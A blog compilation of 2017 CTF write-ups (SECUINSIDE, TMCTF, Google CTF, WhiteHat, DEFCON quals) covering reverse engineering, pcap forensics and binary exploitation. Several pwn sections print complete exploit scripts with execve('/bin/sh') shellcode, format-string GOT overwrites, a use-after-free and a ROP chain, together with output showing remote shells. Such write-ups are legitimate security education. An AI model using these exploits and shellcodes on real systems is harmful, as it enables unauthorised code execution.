20170701_SECUINSIDECTF Writeup

20170701_SECUINSIDECTF Writeup

Yesterday and today, I joined in 20170701_SECUINSIDECTF. There were many difficult problems, and unsolved one.

Fortunately, I could solve 2problem, OHCE and SNAKE. I wrote my solution below.

OHCE pwn

 

This is Stack base overflow chall. This process as below.

 

– First print menu, and I can choose 1. echo 2, reverse echo, 3.exit

– if choose 1, I can type something, and return echo

– if choose 2, I can type something, and return reverse string I typed

– if choose 3, exit program

 

Let’s analyze it. And realize that this don’t have any protection,

 

$ checksec ohce
[*] ‘/mnt/hgfs/VM-Share/20170701_SECUINSIDECTF/ohce/ohce’
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE

 

Next, I continue to execute it, several minutes, I find out that there is Null Byte Termination Vulnerability.

If I input 31+32*n chars in echo mode, next data is leaked. And when I input it in reverse echo, program is halted.

—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�?Hc�
—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 2
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�cH?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSegmentation fault (core dumped)

 

What’s happened? Below picuture show that stack information when input 31+32*n chars.

(In this picture unfortunately data of 0x7fffffffdae0 is 00, so this leak don’t occurred…)

 

 

Then reverse echo, because of Null Byte Termination Vulnerability, I can overwrite next address.

Finally overwritten address become esp in [0x400268 mov rsp,rbp], I can got rip.

 

Exploitation is below.

– First leak stack address to write 31 chars in echo

– Next write many chars and stack address to go to shellscript (address in red rectangle) in echo

– Write shellscript and stack address to go to below address (address in light blue rectangle) in reverse echo.

 

 

 
$ python solve_ohce.py
[+] Opening connection to 13.124.134.94 on port 8888: Done
—————–
\x001. echo
2. echo(Reverse)
3. Exit\x00
—————–
\x00 >
0x7ffe4db737a0
0x7ffe4db73770
\x7f\xfeM\xb76`AAAAA\x05\x0f;\xb0^TWR\x99_TS��H\xff\x97\x8cБ\x96\x9dѻH�1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
[*] Switching to interactive mode
\x00\x7f\xfeM\xb77\xa0
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901�H\xbbѝ\x96\x91Ќ\x97\xffH��ST_\x99RWT^\xb0;\x0f\x05AAAAA`6\xb7M\xfe\x7f$
$
$
$
$
$ ls
flag
ohce
$ cat flag
SECU[the_true_world_and_1n_here_1s_the_dream]
[*] Got EOF while reading in interactive
$
 

SNAKE rev

 

This is the old snake game program.

Several hours investigation, I recognize that this algorithm is as below. (function name is named by me.)

 


 

This program calculate enc_flag and xor-ed another data in clear_game function.

At first, I tried to make script to make those data, but I can’t do this. So I change my direction as below.

 

– I patch program to return true on if(judge_goal) statement.

 

 

 

– I patch program not to change time_duration.

 

 

Then execute it, After several minutes, I can get flag. (You must control snake not to crash to wall until getting flag.)

 

 

 

 

 
SECU[hack_is_the_wine_of_life._Let’s_drink_it.]�u����@
 
 
Patched program:

 

20170624_TMCTF

20170624_TMCTF

 

TMCTF has many Windows based chall and network chall, So I learned about windows reverse method in this ctf. I got 4challs and writeup are below.

 

Reverse 100

 

At first, I get zip file. Using file command, I realize that this file is rar file. So change extension of the file to .rar and extract it.

Then exitract, 2 files is given, biscuit1, biscuit2. biscuit1 is PE32 file and Biscuit2 is password locked zip file. 

$ file biscuit*
biscuit1:     PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
biscuit2:     Zip archive data, at least v2.0 to extract

 

First execute biscuit1.exe, and output is below. I think password of biscuit2.zip is in biscuit1.exe.

>biscuit1.exe
Please find sweets name starting from m for biscuit2.

 

Let’s see this in Ida Pro.

 

 

I understand that I break near leave and can see password in x64dbg.

 

I got password of this. Then I extract 3files and file command to each file.

$ file biscuit*
biscuit3:     JPEG image data, JFIF standard 1.01, aspect ratio, density 1×1, segment length 16, comment: “Optimized by JPEGmini 3.13.3.15 0x411b5876”, baseline, precision 8, 150×150, frames 3
biscuit4:     ASCII text, with CRLF line terminators
biscuit5:     PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

 

First biscuit3 is JPG, but some odd data(Zip file) is in last part. After extraction, There is 1 text file “cream”

 

Biscuit4 is txt file, “Flag = TMCTF{biscuit3_ biscuit5}”

 

Biscuit5 is PE file too, So analyze file by the same way of biscuit1 and get the string, So finally get the flag.

(TMCTF{biscuit3_ biscuit5} is wrong, TMCTF{biscuit5_biscuit3} is correct, I spend some time to realize that :-()

 


Analysis-Offensive 100

 

I’m given Forensic_Encyption file, and this file is zip file. Then extract it, there are 3 files.

File1 is jpg, fille2 is password locked zip file, file3 is pcap fille. At first, I survey file1, there is some odd string as below. 

 

 

Bese64 decode this string, and put it into fille2 password form, I can extract key.txt. Key.txt seems ESP encryption/Authentication key.

$ echo “VHVyaW5nX01hY2hpbmVfYXV0b21hdG9u” | base64 -d
Turing_Machine_automaton
 
$ cat key.tet
src 192.168.30.211 dst 192.168.30.251
        proto esp spi 0xc300fae7 reqid 1 mode transport
        replay-window 32
        auth hmac(sha1) 0x2f279b853294aad4547d5773e5108de7717f5284
        enc cbc(aes) 0x9d1d2cfa9fa8be81f3e735090c7bd272
        sel src 192.168.30.211/32 dst 192.168.30.251/32
src 192.168.30.251 dst 192.168.30.211
        proto esp spi 0xce66f4fa reqid 1 mode transport
        replay-window 32
        auth hmac(sha1) 0x3bf9c1a31f707731a762ea45a85e21a2192797a3
        enc cbc(aes) 0x886f7e33d21c79ea5bac61e3e17c0422
        sel src 192.168.30.251/32 dst 192.168.30.211/32

 

So I put those information into file3 by wireshark as below.

 

Then ESP packets are decrypted, and I can find below information.

 

After some investigation, I find that those information is related to enigma crypto. So I decode it by using below site.

https://people.physik.hu-berlin.de/~palloks/js/enigma/enigma-m4_v16_en.html

 

 

 


 

misc100

I get 1 pcap file but header of the file is wrong, so I change first 4byte of header A1B2C3D4 to D4C3B2A1.

To do so, I can open wireshark.First I find that some SSL/FTP packets. In traffic of FTP, SSL pre-master secret log is sent, so I save this file and decrypt SSL traffic by using below way.

In the Wireshark configuration menu Edit -> Preferences -> Protocols -> SSL,
    1. In the “Pre-Shared-Key” field, enter Kpsa, i.e. 1a2b3c4d5e6f7a8b
    2. In the (Pre)-Master-Secret log filename field, enter the name of a text file which includes Client Random (32 bytes as 64 hex characters) and the Master          
       Secret (48 bytes as 96 hex characters) as a text line as follows:
             CLIENT_RANDOM <space> 64-characters-random <space> 96-characters-Master-Secret
 
After decryption, I find some html /jpg / css. When I open this html, I can see below page.

 

In this page’s source, There is some odd string ” <samp>HINT: visual cryptgraphy</samp>”.  I realize that I need to decode the flag by using visual cryptography 2 pictures seem like mosaic.

Finally I got flag. (To extract, I use the site to extract base64-ed image: http://ift.tt/2t9HzQj)


Reverse 200

 

I can get some odd text file. After some investigation (by googling “ASK/Manchester Clock 64″), I realize that this is output of RFID tag’s bit stream.

How can I get tag number? Accoding to this site http://ift.tt/2t9Qcuq, Output bitstream is repeated tag information by dividing “111111111”, so I extract tag information (part of green letters in below) and calculate it.

Using Clock:64, Invert:0, Bits Found:625
ASK/Manchester – Clock: 64 – Decoded bitstream:
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101

 

Below script is calculating method.

str = [0b11110 ,0b11101 ,0b11101 ,0b11011 ,0b11011 ,0b11101 ,0b11000 ,0b10100 ,0b11110 ,0b11101]
for i in str:
    print hex(i>>1)

 

20170617_googleCTF

20170617_googleCTF

Last week, I joined googleCTF, but I couldn’t solve only 2 chall :-(.  I make writeup of chall I solve.

 
Food
 

This is RE chall and at first, I am given android apk file “food.apk”.

At first dissassemble this file in online service: http://ift.tt/1H4YAZ1.

And get source file. After some investigate, I realize that FoodActivity class execute System.loadLibrary(“cook”) in com/google/ctf/food.

Then I check libcook.so in lib/x86/ by IDA Pro.

 

In this JNI_OnLoad ection, so many values move to stack and execute dec_str function (I named).

 

Then I try to find out what this function do, and recoginize it as beolw.

# divide int to 4-byte value
def parse_to_byte(val):
    byte = []
    byte.append((val>>24)&0xff) # BYTE3
    byte.append((val>>16)&0xff) # BYTE2
    byte.append((val>>8)&0xff) # BYTE1
    byte.append((val)&0xff)
return byte
 
string = “”
 
# decrypt 
for i in str:
    byte_array = parse_to_byte(i)
 
    string += chr(byte_array[0]^byte_array[1])
    string += chr(~((byte_array[2] | ~byte_array[3]) & (byte_array[3] | ~byte_array[2])))
 
print string[::1]
 
#str = [0x1D650B6E, 0x1377416F, 0x16724D62, 0x5320096C, 0x5691D74, 0x86E5A75, 0x4420046B, 0x6F096F, 0x4D634620, 0x10640D6E, 0x4F614520, 0x0A660265, 0x0A650D62, 0x47204A64, 0x36E1A75, 0x0C6F5D72, 0x6675420, 0x4650C68, 0x5B744120, 0x10640564, 0x25410F20]
# -> “/data/data/http://ift.tt/2tisMQq”

 

Then area of 0x00001640+0x15a8 write to d.dex file.

 

And finally call sub_710 function.

 

After analyze of this function, I realize that this function replace one part of d.dex file to another data. 

Inspected source of this function is as below

 

 

Data to replace is in the 0x000015A0+0x90 and xor-ed it by 0x5a.

So I replace this data to d.dex by binary editor manually. And decompile d.dex again by online service.

 

Then I can find 4 files in com/google/ctf/food directory. In C0000F class, flag value and cc() function.

And in cc() function C0004.m0() function caluculate flag and this.f2k.

I can calculate this.f2k by xor-ing bArr and “\u0013\u0011\u0013\u0003\u0004\u0003\u0001\u0005”, So I can find out flag by execute C0004.m0(flag, this.f2k).

I make java file of m0 function, and execute it. (java source is below link)

https://github.com/nacayoshi00/CTF-writeup/blob/master/20170617_googleCTF/solve_.java

 

20170527_Whitehat_chall writeup

20170527_Whitehat_chall writeup

I have joined in WhiteHat challenge #13 in this weekend. Finally I solved 3 challs and got 400pt.

MuiNe

This chall is Pwn of Format string bug(FSB). This program just only echo user input once, and finish executtion.
This program may be run by ASLR. So I need to know libc address and pwn it, but this can only one echo.
How do I solve it?

 

At first, I try to run main function in one execution. If user input larger than expected, SSP check this in last part of execution.

In this check, __stack_chk_fail function will be call, so I overwrite got of __stack_chk_fail to main function address by FSB.

After overwrite, I can do many times echo (you need to input large string enough to call __stack_chk_fail function.).

# got of __stack_chk_fail to start of main function(0x0804851B) to be able to loop
data = p32(0x0804A014)+p32(0x0804A015)+p32(0x0804A016)+p32(0x0804A017)
data += “%11c%7$hhn”
data += “%106c%8$hhn”
data += “%127c%9$hhn”
data += “%4c%10$hhn”

 

Then I leak libc address information, and calculate system address(execute “p system” in gdb), /bin/sh address(execute “find /bin/sh” in gdb) , exit address(execute “p exit” in gdb) .

# Leak information by format string

data = “%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x”

 

r.sendline(data)

l = r.recvuntil(“echo “)

print l.split(“,”)[4]

 

# calculate offset of each address and add libc_base.

libc_base = int((“0x”+l.split(“,”)[4]),16) – 0x4538 #offset

system_addr = libc_base + 0x3ada0

bin_sh_addr = libc_base + 0x15b82b

exit_addr = libc_base + 0x2e9d0

 

print hex(libc_base)

 

Finally I execute system function by stack buffer overflow(BoF), but I can’t do because “lea     esp, [ecx-4] ” in the last part of main function change esp to another part that I can’t set by BoF.

So to avoid this, I try to call leave function to skip stack pointer to the place where I BoFed by overwriting got of __stack_chk_fail function again.

 

All of the script is as below.

from pwn import *
target = “formatme.wargame.whitehat.vn”
port = 1337
r = remote(target, port)
raw_input()
l = r.recvuntil(“echo “)
print l
# got of __stack_chk_fail to start of main function(0x0804851B) to be able to loop
data = p32(0x0804A014)+p32(0x0804A015)+p32(0x0804A016)+p32(0x0804A017)
data += “%11c%7$hhn”
data += “%106c%8$hhn”
data += “%127c%9$hhn”
data += “%4c%10$hhn”
print data
r.sendline(data)
l = r.recvuntil(“echo “)
# Leak information by format string
data = “%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x,%08x”
r.sendline(data)
l = r.recvuntil(“echo “)
print l.split(“,”)[4]
# calculate offset of each address and add libc_base.
libc_base = int((“0x”+l.split(“,”)[4]),16) – 0x4538 #offset
system_addr = libc_base + 0x3ada0
bin_sh_addr = libc_base + 0x15b82b
exit_addr = libc_base + 0x2e9d0
print hex(libc_base)
”’
 At first need to avoid below.
_text:080485A3 03C 8B 4D FC       mov     ecx, [ebp+var_4]
_text:080485A6 03C C9             leave
_text:080485A7 000 8D 61 FC       lea     esp, [ecx-4]
So I use below gadget to avoid above part
0x08048488: leave  ; rep ret  ;  (1 found)
and execute system function
”’
data = “AAAA”*4*3+p32(system_addr)+p32(exit_addr)+p32(bin_sh_addr)
data += p32(0x0804A017)+p32(0x0804A016)+p32(0x0804A015)+p32(0x0804A014)
data += “%188c%22$hhn”
data += “%252c%23$hhn”
data += “%128c%24$hhn”
data += “%4c%25$hhn”
print data
r.sendline(data)
r.interactive()

 

$ python solve_fomat_me.py
[+] Opening connection to formatme.wargame.whitehat.vn on port 1337: Done
echo
\x14\xa0\x0\x15\xa0\x0\x16\xa0\x0\x17\xa0\x0%11c%7$hhn%106c%8$hhn%127c%9$hhn%4c%10$hhn
f75cc538
0xf75c8000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0-`��i_�+8r��\x16\xa0\x0\x15\xa0\x0\x14\xa0\x0%188c%22$hhn%252c%23$hhn%128c%24$hhn%4c%25$hhn
[*] Switching to interactive mode
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xa0-`��i_�+8r��\x16\xa0\x0\x15\xa0\x0\x14\xa0\x0                                                                                                                                                                                           \x00                                                                                                                                                                                                                                                                                                                                                                                          \x0
$
$
$
$ ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
my_ssh_key
my_ssl_key
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
$ cd home
$ ls
format_me
ubuntu
$ cd format_me
$ ls
flag
format_meb1946ac92492d2347c6235b4d2611184
$ cat flag
%n_was_a_good_idea?
$

 

Finally I got flag and calculate SHA1(“%n_was_a_good_idea?”).

 

Tuy Hoa

 

This is the RE problem that is able to solve by angr.

 

I find out that I can get flag if go through 0x400ea8. And if password wrong, go to 0x40096d.

 

Screenshot_1

Screenshot_2
So I write script by using angr as below.
import angr
def main():
    p = angr.Project(“./re100”, load_options={‘auto_load_libs’: False})
    ex = p.surveyors.Explorer(find=(0x400EA8, ), avoid=(0x40096D,))
    ex.run()
    return ex.found[0].state.posix.dumps(0).strip(‘\0\n’)
def test():
    assert main() == ”
if __name__ == ‘__main__’:
    print main()

 

$ python solve_re100.py
5a62af9a23b56ee49370808a0cf1e8096757257@@@@@@@@@@@@@@@
@@@@
$ ./re100
input password:
5a62af9a23b56ee49370808a0cf1e80967572570
Good password!!!

 

 

Hue

 

This is the problem that is related to several barcode.

 

 

At first I am given one password locked ZIP file and many PNG files that contain country flag.

In many image files, There are strange file that seems part of QR code. So I try to recover them.

 

And decode it, then get ZIP password.

 

Then I get below image file. I remember problem description again, and there is strange string “Dot Code”.

 

 

I google it and get solver of DotCode

 

http://ift.tt/2qvPodn

(You need to install it to Android/iOS, and don’t forget set dotcode enable in setting)

 

And get flag.

 

20170429_DEFCON Writeup (empanada)

20170429_DEFCON Writeup (empanada)

I was solved this challenge after DEFCON. It difficult for me and note solution for reminder.

 

This program may be string stored program, so client send the header, command and data, it stores this.

And it can also print data, combine data and remove data.

 

At first, check file, this program is set NX-bit only.

$ checksec empanada
[*] ‘/mnt/hgfs/VM-Share/20170429_DEFCON/empanada’
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE

 

Then I try to disassemble by IDA Pro. There are 2 functions in main function, empDcdPmsg and  empDcdPmsgCmd

 

 

After some investigation, I find that this algorithmmay be as below.

# command, client can set command to process data
RM_ALL_MSG = 0x00         # remove all data
STORE_MSG = 0x10          # stored data
GET_HSUM = 0x20           # calculate sum
GET_MSG = 0x30            # print data
GET_MSG_COUNT = 0x40      # print number of message
RM_MSG = 0x50             # remove data
GET_ALL = 0x60            # print combined all stored data
CLEAR_INVALID_MSG = 0xfe  # remove invalid data (may calculate by paticuler function: empCliHsum,empSrvHsum)
# mtype, if IS_CMD set, empDcdPmsgCmd will be run.
IS_CMD = 0x1
IS_NOT_CMD = 0x0
# client can set midx to post continued command. If midx is i, I can send another command consequently.
def send_cmd(cmd, mtype, midx, msize, payload):
    assert ((mtype >= 0) & (mtype <= 1))
    assert ((msize >= 0) & (msize <= 31))
    assert ((midx >= 0) & (midx <= 3))
    header = 0
    header |= (mtype << 7)
    header |= (midx << 5)
    header |= msize+1
    log.info(“header => “+bin(header)+”(“+hex(header)+”), cmd=> “+hex(cmd) +”, payload => ‘”+payload+”‘”)
    s.send(chr(header))
    s.send(chr(cmd)+payload)
    l = s.recv(timeout=1)
    print l

 

First, I send the 2 message, and run gdb. This program stores data to mmaped area(0x31337000-).

And this pointer is stored in g_empList(0x08050174).

 

# send 2-data to server
data =”b”*16
send_cmd(STORE_MSG, IS_CMD,1,len(data),data)
data =”b”*15
send_cmd(STORE_MSG, IS_NOT_CMD,0,len(data),data)
 
# send 2-data to server
data =”b”*10
send_cmd(STORE_MSG, IS_CMD,1,len(data),data)
data =”b”*15
send_cmd(STORE_MSG, IS_NOT_CMD,0,len(data),data)

 

This gdb output is as below. In 1 chunk, there are some data, chunk_used, next_chunk_pointer, cmd, msize, mtype, data, pointer to empCliHsum,empSrvHsum, and next_data_pointer.

So I think exploit method that I overwrite pointer of empCliHsum,empSrvHsum to shellcode somehow, and execute it.

 

 

After some tries, I find that I over write the pointer when I send GET_ALL command. If send GET_ALL command, it combines all data and stores mmaped area.

So if combined data is small enough to store in Use-After Freed chunk, I can execute shellcode.

 

How do I make Use-After Freed chunk? Then I continue to investigate, I find that I make it when send 2-data then execute CLEAR_INVALID_MSG command.

(I can’t find out why finally… If find, please tell me.)

 

This is output after executing CLEAR_INVALID_MSG. 2nd data is freed.

If execute below command. I can get RIP.
———–
data =”b”*16
send_cmd(STORE_MSG, IS_CMD,1,len(data),data)
data =”b”*15
send_cmd(STORE_MSG, IS_NOT_CMD,0,len(data),data)
data =”b”*10
send_cmd(STORE_MSG, IS_CMD,1,len(data),data)
data =”b”*15
send_cmd(STORE_MSG, IS_NOT_CMD,0,len(data),data)
data = “”
send_cmd(CLEAR_INVALID_MSG, IS_CMD,0,len(data),data)
data =”x”*15
send_cmd(STORE_MSG, IS_CMD,0,len(data),data)
data =”z”*15
send_cmd(STORE_MSG, IS_CMD,0,len(data),data)
data = “”
send_cmd(GET_ALL, IS_CMD,0,len(data),data)
———–
$ python solve_empanada.py
[+] Opening connection to 127.0.0.1 on port 1337: Done
[*] header => 0b10110001(0xb1), cmd=> 0x10, payload => ‘bbbbbbbbbbbbbbbb’
[*] header => 0b10000(0x10), cmd=> 0x10, payload => ‘bbbbbbbbbbbbbbb’
_[StoreMessage] => Return: SucceBs
[*] header => 0b10101011(0xab), cmd=> 0x10, payload => ‘bbbbbbbbbb’
[*] header => 0b10000(0x10), cmd=> 0x10, payload => ‘bbbbbbbbbbbbbbb’
_[StoreMessage] => Return: SucceBs
[*] header => 0b10000001(0x81), cmd=> 0xfe, payload => ”                    <- free both 2nd chunk
;[ClearInvalid] => Return: 2
[*] header => 0b10010000(0x90), cmd=> 0x10, payload => ‘xxxxxxxxxxxxxxx’     <- stored freed chunk
_[StoreMessage] => Return: SucceBs
[*] header => 0b10010000(0x90), cmd=> 0x10, payload => ‘zzzzzzzzzzzzzzz’     <- stored freed chunk
_[StoreMessage] => Return: SucceBs
[*] header => 0b10000001(0x81), cmd=> 0x60, payload => ”
\x00\x10bbbbbbbbbbbbbbbbxxxxxxxxxxxxxxx\x10bbbbbbbbbbzzzzzzzzzzzzzzzxxxxxxxxxxxxxxxzzzzzzzzzzzzzzz <-Use After Free(marked)

 

Finally, I can execute script, I can get flag.

 

from pwn import *
# command
RM_ALL_MSG = 0x00
STORE_MSG = 0x10
GET_HSUM = 0x20
GET_MSG = 0x30
GET_MSG_COUNT = 0x40
RM_MSG = 0x50
GET_ALL = 0x60
CLEAR_INVALID_MSG = 0xfe
# mtype
IS_CMD = 0x1
IS_NOT_CMD = 0x0
s = remote(‘127.0.0.1’, 1337)
raw_input()
def send_cmd(cmd, mtype, midx, msize,payload):
    assert ((mtype >= 0) & (mtype <= 1))
    assert ((msize >= 0) & (msize <= 31))
    assert ((midx >= 0) & (midx <= 3))
    header = 0
    header |= (mtype << 7)
    header |= (midx << 5)
    header |= msize+1
    log.info(“header => “+bin(header)+”(“+hex(header)+”), cmd=> “+hex(cmd) +”, payload => ‘”+payload+”‘”)
    s.send(chr(header))
    s.send(chr(cmd)+payload)
    l = s.recv(timeout=1)
    print l
# store shellcode
data =”\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80″
send_cmd(STORE_MSG, IS_CMD,1,len(data),data)
data =”a”*15
send_cmd(STORE_MSG, IS_NOT_CMD,0,len(data),data)
data =”b”*16
send_cmd(STORE_MSG, IS_CMD,1,len(data),data)
data =”b”*15
send_cmd(STORE_MSG, IS_NOT_CMD,0,len(data),data)
data =”1″*17+p32(0x33701010)
send_cmd(STORE_MSG, IS_CMD,0,len(data),data)
data = “”
send_cmd(CLEAR_INVALID_MSG, IS_CMD,0,len(data),data)
data =”x”*15
send_cmd(STORE_MSG, IS_CMD,0,len(data),data)
data =”z”*15
send_cmd(STORE_MSG, IS_CMD,0,len(data),data)
data = “”
send_cmd(RM_MSG, IS_CMD,0,len(data),data)
data = “”
send_cmd(RM_MSG, IS_CMD,0,len(data),data)
data = “”
send_cmd(GET_ALL, IS_CMD,0,len(data),data)
data = “”
send_cmd(CLEAR_INVALID_MSG, IS_CMD,0,len(data),data)
s.interactive()
”’
$ python solve_empanada.py
[+] Opening connection to 127.0.0.1 on port 1337: Done
[*] header => 0b10111010(0xba), cmd=> 0x10, payload => ‘1�Ph//shh/bin\x89�PS\x89���\xb0\x0b̀’
[*] header => 0b10000(0x10), cmd=> 0x10, payload => ‘aaaaaaaaaaaaaaa’
_[StoreMessage] => Return: SucceBs
[*] header => 0b10110001(0xb1), cmd=> 0x10, payload => ‘bbbbbbbbbbbbbbbb’
[*] header => 0b10000(0x10), cmd=> 0x10, payload => ‘bbbbbbbbbbbbbbb’
_[StoreMessage] => Return: SucceBs
[*] header => 0b10010110(0x96), cmd=> 0x10, payload => ‘11111111111111111\x10\x10p3’
_[StoreMessage] => Return: SucceBs
[*] header => 0b10000001(0x81), cmd=> 0xfe, payload => ”
;[ClearInvalid] => Return: 2
[*] header => 0b10010000(0x90), cmd=> 0x10, payload => ‘xxxxxxxxxxxxxxx’
_[StoreMessage] => Return: SucceBs
[*] header => 0b10010000(0x90), cmd=> 0x10, payload => ‘zzzzzzzzzzzzzzz’
_[StoreMessage] => Return: SucceBs
[*] header => 0b10000001(0x81), cmd=> 0x50, payload => ”
_[DeleteMessage] => Return: SuccCss
[*] header => 0b10000001(0x81), cmd=> 0x50, payload => ”
_
[*] header => 0b10000001(0x81), cmd=> 0x60, payload => ”
[DeleteMessage] => Return: SuccCss
[*] header => 0b10000001(0x81), cmd=> 0xfe, payload => ”
\x0011111111111111111\x10\x10p311111111111111\x10\x10p31
[*] Switching to interactive mode
$
$
$ ls
flag

 

20170429_DEFCON Writeup2

20170429_DEFCON Writeup2

Last year, I couldn’t solve any challenge in DEFCON. I was sooooo sad! :-(.
But this DEFCON could solve 4 challenge, I recognize impruving myskill :-).
 
crackme

 

This is RE Challenge, I need to find particular word and send its base64-encoded string.

 

This is main disassembled mainfunction. I can see sub_C6C function may compare user input and judge collect or not.

 

 

In sub_C6C function there are many function called. Each function is so small anly compare 1 character.

So I try to find out what character each function compare.

 

 

 

 

Finally I solve it.

$ echo “yes and his hands shook with ex” |base64 –
eWVzIGFuZCBoaXMgaGFuZHMgc2hvb2sgd2l0aCBleAo=
$ nc crackme1_f92e0ab22352440383d58be8f046bebe.quals.shallweplayaga.me 10001
send your solution as base64, followed by a newline
4a2181aaf70b04ec984c233fbe50a1fe600f90062a58d6b69ea15b85531b9652
eWVzIGFuZCBoaXMgaGFuZHMgc2hvb2sgd2l0aCBleAo=
The flag is: important videos best playlist Wigeekuk8

smashme

 

In this challenge, I use return-to-text method to soleve it.

 

 

There is no mitigation, so I can exploit just sending shellcode.

 

$ checksec smashme

[*] ‘/mnt/hgfs/VM-Share/20170429_DEFCON/smashme’

Arch:     amd64-64-little

RELRO:    Partial RELRO

Stack:    No canary found

NX:       NX disabled

PIE:      No PIE

 

Disassembled main function is as below. But at first, I don’t know each function in got-plt section because these sympolic name may be removed.

 

 

I need to find function in .got_plt, so I try to find function as below method.  (ex. 0xc9020 point to memmove)

gdb-peda$ x/10gx 0x00000000006C9020
0x6c9020:    0x0000000000431d60    0x000000000043abf0
0x6c9030:    0x000000000043cd30    0x000000000042db90
0x6c9040:    0x00000000004286a0    0x000000000043d1d0
0x6c9050:    0x000000000042d8e0    0x0000000000493620
0x6c9060:    0x0000000000420940    0x0000000000000000
gdb-peda$x/i 0x0000000000431d60
   0x431d60 <__memmove_avx_unaligned>:    mov    rax,rdi
gdb-peda$

 

Finally I find out got_plt function.

 

 

 

So I find that I escape exit function if I input “”Smash me outside, how bout dAAAAAAAAA”. So I input this, I can go to ret, and do buffer over flow.

For exploitation, I use the Return-to-text(.bss). First return to read function to write user input (shellcode) to bss section. Then input shellcode, and return to bss.

from pwn import *
#r = process(‘./smashme’)
r = remote(‘smashme_omgbabysfirst.quals.shallweplayaga.me’, 57348)
raw_input()
l = r.recvuntil(“Welcome to the Dr. Phil Show. Wanna smash?\n”)
print l
elf = ELF(‘./smashme’)
addr_read = elf.symbols[‘read’]
bss = elf.bss()+0x100
log.info(“[+]”+hex(addr_read))
shellcode = “\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05”
pop_rsi_r15 = 0x004a02d3
pop_rdi = 0x0049c8d3
pwn = “Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”
print hex(bss)
print hex(pop_rsi_r15)
# rsi = p64(bss), rdi = 0(stdin), and goto p64(bss)
payload = pwn + p64(pop_rsi_r15)+ p64(bss)+”aaaabbbb”+p64(pop_rdi)+p64(0)+p64(addr_read)+ p64(bss)
print payload
r.sendline(payload)
r.sendline(shellcode)
r.interactive()

 

 

main:
        push    rbp
        mov     rbp, rsp
        sub     rsp, 32
        mov     DWORD PTR [rbp-4], 0
        mov     DWORD PTR [rbp-8], 50
        mov     eax, DWORD PTR [rbp-8]
        movsx   rdx, eax
        lea     rcx, [rbp-32]
        mov     eax, DWORD PTR [rbp-4]
        mov     rsi, rcx
        mov     edi, eax
        call    read
        mov     eax, 0
        leave
        ret          ; rsi = pointer of buf, rdi = fd, rdx = size

 

 

$ python solve_smashme.py
[+] Opening connection to smashme_omgbabysfirst.quals.shallweplayaga.me on port 57348: Done
Welcome to the Dr. Phil Show. Wanna smash?
[*] ‘/mnt/hgfs/VM-Share/20170429_DEFCON/smashme’
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE
[*] [+]0x43ea10
0x6cac60
0x4a02d3
Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�J\x00\x00\x00\x00\x00`\xacl\x00\x00\x00\x00\x00aaaabbbb��I\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10�C\x00\x00\x00\x00`\xacl\x00\x00\x00\x00\x00
[*] Switching to interactive mode
$
$
$ ls
flag
smashme
$ cat flag
The flag is: You must be at least this tall to play DEF CON CTF 5b43e02608d66dca6144aaec956ec68d
$

magic

 

 

This challenge is similar to crackme challenge, but I need to solve and find flag from many binaries (200 files).

So I try to automate solve method by using python+capstone.

At first I try to find out where this binary start the subroutine which compare user input. After several minutes, I find out all of binary’s subroutines may be in the range from 0x000000000000093B  to 0x0000000000000dff (it don’t need to adjust accurately, because all I need is to be able to pick up all of “cmp rdi, XXh”)

 

 

Source code is as below.

from capstone import *
from pwn import *
import re
import base64
 
def extract_flag(filename):
    f = open(filename,”r”)
    data = f.read()
 
    flag = “”
 
    start = 0x000000000000093B
    end = 0x0000000000000dff
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    for i in md.disasm(data[start:end], end):
        if i.mnemonic == “cmp”:
            if (len(i.op_str.split(‘, ‘)[1]) == 4) & (i.op_str.split(‘, ‘)[0] == “rdi”):
                char = i.op_str.split(‘, ‘)[1]
                flag += chr(int(char,16))
                #print(“%s” %(i.op_str))
 
    return flag
 
